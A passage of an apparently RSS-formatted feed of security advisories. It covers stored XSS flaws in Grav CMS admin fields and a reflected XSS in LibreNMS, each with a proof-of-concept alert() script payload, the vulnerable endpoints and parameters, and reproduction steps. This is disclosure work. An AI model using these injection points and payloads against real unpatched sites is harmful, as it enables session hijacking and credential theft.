class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;steps-to-reproduce&amp;#34;&amp;gt;Steps to Reproduce:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Log into the Grav Admin Panel and navigate to &amp;lt;b&amp;gt;Pages&amp;lt;/b&amp;gt;.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Create or edit a page.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Inject the payload above into any of the following fields in the Options tab: &amp;lt;b&amp;gt;Metadata&amp;lt;/b&amp;gt; key name; &amp;lt;b&amp;gt;Category&amp;lt;/b&amp;gt; under Taxonomy; &amp;lt;b&amp;gt;Tag&amp;lt;/b&amp;gt; under Taxonomy:&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66311/image.png&amp;#34;
	width=&amp;#34;1889&amp;#34;
	height=&amp;#34;772&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66311/image_hu_129d0e4604e7b1d0.png 480w, /p/cve-2025-66311/image_hu_380b4f06d4f89362.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;244&amp;#34;
		data-flex-basis=&amp;#34;587px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66311/image-1.png&amp;#34;
	width=&amp;#34;848&amp;#34;
	height=&amp;#34;680&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66311/image-1_hu_cc5fbfca26033db6.png 480w, /p/cve-2025-66311/image-1_hu_84c2ecb12a0e25dd.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;124&amp;#34;
		data-flex-basis=&amp;#34;299px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Save the page.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66311/image-2.png&amp;#34;
	width=&amp;#34;1093&amp;#34;
	height=&amp;#34;559&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66311/image-2_hu_9166270826c0da33.png 480w, /p/cve-2025-66311/image-2_hu_25d09907adc2064.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;195&amp;#34;
		data-flex-basis=&amp;#34;469px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;When the page is loaded again in the Admin Panel or potentially on the frontend (depending on how the metadata is used), the script is executed, confirming the Stored XSS vulnerability.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/getgrav/grav/security/advisories/GHSA-mpjj-4688-3fxg&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/getgrav/grav/security/advisories/GHSA-mpjj-4688-3fxg&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 01 Dec 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-66312</title>
        <link>https://www.cvehunters.com/p/cve-2025-66312/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-66312/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-66312-cross-site-scripting-xss-stored-endpoint-adminaccountsgroupsgroup-parameter-datareadablename&amp;#34;&amp;gt;CVE-2025-66312: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;/admin/accounts/groups/[group]&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;data[readableName]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-66312&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-66312&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;/admin/accounts/groups/Grupo&amp;lt;/code&amp;gt; endpoint of the Grav application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;data[readableName]&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /admin/accounts/groups/Grupo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-66312-cross-site-scripting-xss-stored-endpoint-adminaccountsgroupsgroup-parameter-datareadablename&amp;#34;&amp;gt;CVE-2025-66312: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;/admin/accounts/groups/[group]&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;data[readableName]&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-66312&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-66312&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;/admin/accounts/groups/Grupo&amp;lt;/code&amp;gt; endpoint of the Grav application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;data[readableName]&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /admin/accounts/groups/Grupo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;data[readableName]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;lt;ScRipT&amp;amp;gt;alert(&amp;amp;#39;PoC-XSS&amp;amp;#39;)&amp;amp;lt;/ScRipT&amp;amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;steps-to-reproduce&amp;#34;&amp;gt;Steps to Reproduce:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Navigate to &amp;lt;b&amp;gt;Accounts &amp;gt; Groups&amp;lt;/b&amp;gt; in the administrative panel.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Create a new group or edit an existing one.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;In the &amp;lt;b&amp;gt;Display Name&amp;lt;/b&amp;gt; field (which maps to &amp;lt;code&amp;gt;data[readableName]&amp;lt;/code&amp;gt;), insert the payload above and save the changes.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66312/image.png&amp;#34;
	width=&amp;#34;1309&amp;#34;
	height=&amp;#34;549&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66312/image_hu_56c71e0062372f4f.png 480w, /p/cve-2025-66312/image_hu_765f3adc436b0b52.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;238&amp;#34;
		data-flex-basis=&amp;#34;572px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;The following HTTP request was generated during this action:&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66312/image-1.png&amp;#34;
	width=&amp;#34;849&amp;#34;
	height=&amp;#34;669&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66312/image-1_hu_635bb1670341f446.png 480w, /p/cve-2025-66312/image-1_hu_79252ce353d0bcdd.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;126&amp;#34;
		data-flex-basis=&amp;#34;304px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Next, go to &amp;lt;b&amp;gt;Accounts &amp;gt; Users&amp;lt;/b&amp;gt; and open any user profile.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66312/image-2.png&amp;#34;
	width=&amp;#34;1307&amp;#34;
	height=&amp;#34;560&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66312/image-2_hu_cc964237802c91e6.png 480w, /p/cve-2025-66312/image-2_hu_ea8f2a27d7b43b7f.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;233&amp;#34;
		data-flex-basis=&amp;#34;560px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;The malicious script is executed immediately in the browser when the page loads, confirming the existence of a Stored XSS vulnerability.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66312/image-3.png&amp;#34;
	width=&amp;#34;945&amp;#34;
	height=&amp;#34;446&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66312/image-3_hu_f451aa2b0f343379.png 480w, /p/cve-2025-66312/image-3_hu_82084485c0851189.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;211&amp;#34;
		data-flex-basis=&amp;#34;508px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Session hijacking: Stealing cookies or authentication tokens to impersonate users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Credential theft: Harvesting usernames and passwords using malicious scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malware delivery: Distributing unwanted or harmful code to victims.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Privilege escalation: Compromising administrative users through persistent scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data manipulation or defacement: Changing or disrupting site content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputation damage: Eroding trust among site users and administrators.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/getgrav/grav/security/advisories/GHSA-rmw5-f87r-w988&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/getgrav/grav/security/advisories/GHSA-rmw5-f87r-w988&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 01 Dec 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-65013</title>
        <link>https://www.cvehunters.com/p/cve-2025-65013/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-65013/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-65013-cross-site-scripting-xss-reflected-in-endpoint-mapsnodeimage-parameter-image-name&amp;#34;&amp;gt;CVE-2025-65013: Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;/maps/nodeimage&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Image Name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-65013&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-65013&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;/maps/nodeimage&amp;lt;/code&amp;gt; endpoint of the LibreNMS application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Image Name&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/maps/nodeimage&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;Image Name&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC-XXS51&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-65013/image.png&amp;#34;
	width=&amp;#34;713&amp;#34;
	height=&amp;#34;589&amp;#34;
	srcset=&amp;#34;/p/cve-2025-65013/image_hu_d47d134d7563c0b1.png 480w, /p/cve-2025-65013/image_hu_790aaa5d86f85434.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;121&amp;#34;
		data-flex-basis=&amp;#34;290px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-65013-cross-site-scripting-xss-reflected-in-endpoint-mapsnodeimage-parameter-image-name&amp;#34;&amp;gt;CVE-2025-65013: Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;/maps/nodeimage&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Image Name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-65013&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-65013&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;/maps/nodeimage&amp;lt;/code&amp;gt; endpoint of the LibreNMS application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Image Name&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/maps/nodeimage&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;Image Name&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
